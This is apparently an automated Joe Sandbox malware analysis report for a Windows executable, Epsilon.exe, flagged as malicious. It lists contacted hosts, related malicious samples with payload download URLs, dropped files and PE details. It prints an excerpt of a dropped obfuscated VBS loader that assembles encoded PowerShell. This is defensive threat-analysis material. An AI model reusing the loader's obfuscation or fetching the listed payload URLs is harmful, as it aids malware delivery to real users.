                                                              https://atlassianblog.wpengine.com/wp-json/wp/v2/posts?tags=11972&context=embed&per_page=6&orderby=dpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://aui-cdn.atlassian.com/powershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/c9b3998323c0/dist/webpackpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://remote-app-switcher.stg-east.frontend.public.atl-paas.netpowershell.exe, 00000007.00000002.2175839410.000001A1DC228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.2430048549.0000027B39E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430048549.0000027B39E57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://bitbucket.org/gateway/api/emoji/powershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.2430048549.0000027B39EBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2175839410.000001A1DC001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bitbucket.orgpowershell.exe, 00000007.00000002.2175839410.000001A1DC3FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              185.166.143.48
                                                                              		bitbucket.orgGermany
                                                                              		16509AMAZON-02USfalse
                                                                              185.199.111.133
                                                                              		raw.githubusercontent.comNetherlands
                                                                              		54113FASTLYUSfalse

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1582590
                                                                              Start date and time:2024-12-31 00:45:05 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 4m 43s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:10
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:Epsilon.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.spre.expl.evad.winEXE@12/8@2/2
                                                                              EGA Information:
                                                                              • Successful, ratio: 50%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 29
                                                                              • Number of non-executed functions: 28
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45, 23.1.237.91
                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target powershell.exe, PID 7504 because it is empty
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: Epsilon.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              18:45:55API Interceptor42x Sleep call for process: powershell.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              185.166.143.48http://bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txtGet hashmaliciousUnknownBrowse
                                                                              • bitbucket.org/aaa14/aaaa/downloads/dFkbkhk.txt
                                                                              185.199.111.133cr_asm2.ps1Get hashmaliciousUnknownBrowse
                                                                              • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                              • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                              • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                              • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              raw.githubusercontent.comeXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.199.110.133
                                                                              Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.199.108.133
                                                                              Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.199.108.133
                                                                              Supplier.batGet hashmaliciousUnknownBrowse
                                                                              • 185.199.110.133
                                                                              Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.199.111.133
                                                                              NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                              • 185.199.111.133
                                                                              fxsound_setup.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.199.109.133
                                                                              OiMp3TH.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.199.108.133
                                                                              8lOT1rXZp5.exeGet hashmaliciousRedLineBrowse
                                                                              • 185.199.111.133
                                                                              Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.199.108.133
                                                                              bitbucket.orgj6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.50
                                                                              fnCae9FQhg.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.48
                                                                              SFtDA07UDr.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.48
                                                                              Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                              • 185.166.143.49
                                                                              Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.166.143.48
                                                                              2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.50
                                                                              tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.48
                                                                              iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.50
                                                                              yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.50
                                                                              NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.50

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              FASTLYUShttps://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                              • 151.101.194.137
                                                                              https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188Get hashmaliciousKnowBe4Browse
                                                                              • 199.232.192.193
                                                                              https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                              • 199.232.188.157
                                                                              eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.199.110.133
                                                                              Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.199.108.133
                                                                              Purchase Order Summary Details.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.199.108.133
                                                                              Supplier.batGet hashmaliciousUnknownBrowse
                                                                              • 185.199.110.133
                                                                              Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.199.111.133
                                                                              NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                              • 185.199.111.133
                                                                              https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                              • 151.101.2.137
                                                                              AMAZON-02USboatnet.arm6.elfGet hashmaliciousMiraiBrowse
                                                                              • 34.249.145.219
                                                                              kwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.168.12.166
                                                                              kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                              • 52.63.235.181
                                                                              kwari.arm7.elfGet hashmaliciousMiraiBrowse
                                                                              • 52.17.112.151
                                                                              boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              dlr.arm7.elfGet hashmaliciousUnknownBrowse
                                                                              • 34.249.145.219
                                                                              https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                                                              • 54.65.22.195
                                                                              BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                              • 18.244.18.122
                                                                              i.elfGet hashmaliciousUnknownBrowse
                                                                              • 54.171.230.55
                                                                              securedoc_20241220T111852.htmlGet hashmaliciousUnknownBrowse
                                                                              • 13.32.121.110

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0eXClient.exeGet hashmaliciousXWormBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              Supplier.batGet hashmaliciousUnknownBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133
                                                                              Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                              • 185.166.143.48
                                                                              • 185.199.111.133

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul/+qll/h:NllU2el/
                                                                              MD5:A228F8449DB5EE3A5E620715CD8F41DF
                                                                              SHA1:79E774D342BD0A4261CE1F7FC6EC2734687629AC
                                                                              SHA-256:C495093C40C899E10AD5F5BD9298B53C090B4A5EDC2D66742BB91A9DD17F35DC
                                                                              SHA-512:40C9E42AE02C452BCAE13DF5BADEA1BE686109BADEDB2E533AC78E813EE39B153E0290901D70E35D840FA960777A81753B40D36E843A66E81D3EB6DB066BF75B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:@...e................................................@..........

                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\677174b841ee7.vbs

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\Epsilon.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):16223
                                                                              Entropy (8bit):5.43957642350105
                                                                              Encrypted:false
                                                                              SSDEEP:384:HvoXNp+ORKJjaaJbx3pvtJqv10MFpW9pUf2:HQXNphK5aaR7tJYw
                                                                              MD5:2526E6344FEFB98B06722075A48EB1D2
                                                                              SHA1:8FED44B0D696CEF3771EDD5B1B6FB836EA56136A
                                                                              SHA-256:4EB0F0207BB99F33B78DA74498525E249B689661EA457DC8BF6AC262FF2FCA43
                                                                              SHA-512:AA5C4D0453829ECFF09AA8864AC7EA78D8588B7D5B47D14F09022338DB5E6C46772BFADAF4BF55441F73AE31C563CA692268FFC594E12887F2F7CF8B461A8653
                                                                              Malicious:true
                                                                              Reputation:low
                                                                              Preview: 'g..FdemrkiadmF = rRegisggfgdsadfkjhgjg211 & ""..kimAIjFcf = TimeSerial(9,8,9)..Call Ugsfisging("$do" & "sigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$")..Call Ugsfisging("ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQ")..IIpddIpA = TimeSerial(7,8,8)..Public Const fhASbpe = "Sdjkmgho"..kjpeImAde = "hffhfg" & LenB("fSgdafdnS") & "hfg"..'dncrigd aIobbokkd..ermnmbgdI = TimeSerial(7,8,7)..Public Const rbiiAAf = "FnmImIbi"..'rgAAkeIp mkmdbek..Call Ugsfisging("B0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b")..Call Ugsfisging("$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$")..kjkdnca = TimeSerial(9,9,8)..Public Const Fbpbdokb = "ioAjImn"..diefdfr = "hffhfg" & LenB("fSoccaj") & "hfg"..'mmkarim hojeAIgfe..kjecpgSg = TimeSerial(7,7,9)..Public Const AIdmpmkkk = "pncmibckk"..'AfarcrI fcIcrhi..Call Ugsfisging("YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yyy4x55.0bl.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqr5bg25.2ly.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jisjgixp.mfl.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mf30trsg.340.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ms0k5ziq.vru.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xddash11.i2w.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):6.8540668895535575
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:Epsilon.exe
                                                                              File size:163'840 bytes
                                                                              MD5:61566aa90d2dcaf483fe4697031f46c4
                                                                              SHA1:b072393ac533c868683a93aa98e350144a772c34
                                                                              SHA256:51826c6098770542d808375156b42c288ba675863a73eca9084c402a11771b2d
                                                                              SHA512:721dc75de9c5027a9f4e864814b2955ea5df8f2222eeea6f2dd4a2e430510eb2d2eec0aa34593f8ecce5e8831f1f1c110f9819a5e0b8424b7e171cf07e36f4d2
                                                                              SSDEEP:3072:mahKyd2n31r5GWp1icKAArDZz4N9GhbkrNEk1q6T:mahOzp0yN90QE6
                                                                              TLSH:D9F38D5AA7E420A6E4BA577498F202935A32BCB15B7583FF12C4D57E0E336C0A532F17
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

                                                                              File Icon

                                                                              Icon Hash:3b6120282c4c5a1f

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x140008200
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:10
                                                                              OS Version Minor:0
                                                                              File Version Major:10
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:10
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              call 00007F7D74D72AA0h
                                                                              dec eax
                                                                              add esp, 28h
                                                                              jmp 00007F7D74D7234Bh
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              dec eax
                                                                              mov dword ptr [esp+08h], ebx
                                                                              dec eax
                                                                              mov dword ptr [esp+10h], edi
                                                                              inc ecx
                                                                              push esi
                                                                              dec eax
                                                                              sub esp, 000000B0h
                                                                              and dword ptr [esp+20h], 00000000h
                                                                              dec eax
                                                                              lea ecx, dword ptr [esp+40h]
                                                                              call dword ptr [000011CDh]
                                                                              nop
                                                                              dec eax
                                                                              mov eax, dword ptr [00000030h]
                                                                              dec eax
                                                                              mov ebx, dword ptr [eax+08h]
                                                                              xor edi, edi
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [00004922h], ebx
                                                                              je 00007F7D74D7234Ch
                                                                              dec eax
                                                                              cmp eax, ebx
                                                                              jne 00007F7D74D7235Ch
                                                                              mov edi, 00000001h
                                                                              mov eax, dword ptr [00004918h]
                                                                              cmp eax, 01h
                                                                              jne 00007F7D74D72359h
                                                                              lea ecx, dword ptr [eax+1Eh]
                                                                              call 00007F7D74D72933h
                                                                              jmp 00007F7D74D723BCh
                                                                              mov ecx, 000003E8h
                                                                              call dword ptr [0000117Eh]
                                                                              jmp 00007F7D74D72309h
                                                                              mov eax, dword ptr [000048F6h]
                                                                              test eax, eax
                                                                              jne 00007F7D74D7239Bh
                                                                              mov dword ptr [000048E8h], 00000001h
                                                                              dec esp
                                                                              lea esi, dword ptr [000013E9h]
                                                                              dec eax
                                                                              lea ebx, dword ptr [000013CAh]
                                                                              dec eax
                                                                              mov dword ptr [esp+30h], ebx
                                                                              mov dword ptr [esp+24h], eax
                                                                              dec ecx
                                                                              cmp ebx, esi
                                                                              jnc 00007F7D74D72367h
                                                                              test eax, eax
                                                                              jne 00007F7D74D72367h
                                                                              dec eax
                                                                              cmp dword ptr [ebx], 00000000h
                                                                              je 00007F7D74D72352h
                                                                              dec eax
                                                                              mov eax, dword ptr [ebx]
                                                                              dec eax
                                                                              mov ecx, dword ptr [00001388h]

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa23c0xb4.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x1cf44.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0xe0000x408.pdata
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c0000x20.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x9a100x54.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x90100x118.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x91280x520.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x7b800x7c0060800deac1fde21b98089f2241ee6168False0.5499936995967742data6.096261782871538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x90000x22c80x240059d15cdf89780817c3d48dd588a6a129False0.4136284722222222data4.727841929207054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xc0000x1f000x4009d1580dccaf8e787a43caf4bba48a079False0.3212890625data3.1889769845125677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .pdata0xe0000x4080x60015cd12257317071f28e4f7b728f8825eFalse0.3932291666666667data3.1563665040475675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .rsrc0xf0000x1d0000x1d0006075aa1bf5851aa836a53a18873ed1eeFalse0.7409415409482759data7.051099807534683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x2c0000x200x200637787151ee546a94902de9694a58fd6False0.083984375data0.4068473715812382IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Resources

                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              AVI0xf9f80x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                              RT_ICON0x128140x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
